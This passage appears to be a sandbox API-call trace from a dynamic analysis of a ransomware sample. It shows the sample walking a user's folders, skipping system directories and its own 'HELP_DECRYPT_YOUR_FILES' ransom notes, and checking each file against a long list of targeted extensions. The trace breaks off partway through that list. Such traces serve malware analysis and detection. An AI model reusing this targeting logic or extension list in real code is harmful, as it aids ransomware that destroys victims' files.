	[0190.277] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85727d99, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85727d99, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85727d99, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0190.277] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85704923, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85704923, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85727d99, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0190.277] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1
	[0190.277] lstrcmpW (lpString1="Links", lpString2="..") returned 1
	[0190.277] lstrcmpW (lpString1="Links", lpString2=".") returned 1
	[0190.277] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0190.277] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0190.277] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Links" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links") returned="C:\\Users\\RDhJ0CNFevzX\\Links"
	[0190.277] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Links" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links") returned="C:\\Users\\RDhJ0CNFevzX\\Links"
	[0190.277] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\") returned="C:\\Users\\RDhJ0CNFevzX\\Links\\"
	[0190.277] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Links\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\") returned="C:\\Users\\RDhJ0CNFevzX\\Links\\"
	[0190.277] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Links\\*.*"
	[0190.277] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0190.278] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Links\\*.*") returned 31
	[0190.278] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.278] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Links\\*.*", cchLength=0x1f | out: lpsz="c:\\users\\rdhj0cnfevzx\\links\\*.*") returned 0x1f
	[0190.278] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.278] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="windows") returned 0x0
	[0190.278] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.278] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="boot") returned 0x0
	[0190.278] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.279] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="system volume information") returned 0x0
	[0190.279] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.279] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0190.279] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.279] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="temp") returned 0x0
	[0190.279] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.279] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="program files") returned 0x0
	[0190.279] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.279] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="program files (x86)") returned 0x0
	[0190.279] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.280] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="appdata") returned 0x0
	[0190.280] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.280] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="application data") returned 0x0
	[0190.280] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.280] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="winnt") returned 0x0
	[0190.280] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.280] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="tmp") returned 0x0
	[0190.280] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.280] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="cache") returned 0x0
	[0190.280] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.280] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="temporary internet files") returned 0x0
	[0190.281] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.281] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="webcache") returned 0x0
	[0190.281] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.281] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="inetcache") returned 0x0
	[0190.281] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.281] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="nvidia") returned 0x0
	[0190.281] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.281] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="packages") returned 0x0
	[0190.281] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.281] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="cookies") returned 0x0
	[0190.282] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.282] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="programdata") returned 0x0
	[0190.282] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0190.282] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0190.282] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0190.282] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0190.282] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Links\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\") returned="C:\\Users\\RDhJ0CNFevzX\\Links\\"
	[0190.282] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini"
	[0190.282] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini") returned 39
	[0190.282] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.283] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini", cchLength=0x27 | out: lpsz="c:\\users\\rdhj0cnfevzx\\links\\desktop.ini") returned 0x27
	[0190.283] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.283] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.283] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\links\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\links\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\links\\desktop.ini"
	[0190.283] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\links\\desktop.ini") returned 39
	[0190.283] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.283] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.284] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0190.284] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.285] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0190.285] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x207, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1
	[0190.285] lstrcmpW (lpString1="Desktop.lnk", lpString2="..") returned 1
	[0190.285] lstrcmpW (lpString1="Desktop.lnk", lpString2=".") returned 1
	[0190.285] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Links\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\") returned="C:\\Users\\RDhJ0CNFevzX\\Links\\"
	[0190.285] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\", lpString2="Desktop.lnk" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk") returned="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk"
	[0190.285] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk") returned 39
	[0190.285] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.285] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk", cchLength=0x27 | out: lpsz="c:\\users\\rdhj0cnfevzx\\links\\desktop.lnk") returned 0x27
	[0190.285] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.285] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\desktop.lnk", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.286] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\links\\desktop.lnk" | out: lpString1="c:\\users\\rdhj0cnfevzx\\links\\desktop.lnk") returned="c:\\users\\rdhj0cnfevzx\\links\\desktop.lnk"
	[0190.286] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\links\\desktop.lnk") returned 39
	[0190.286] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.286] StrStrW (lpFirst=".lnk", lpSrch=".") returned=".lnk"
	[0190.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.286] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.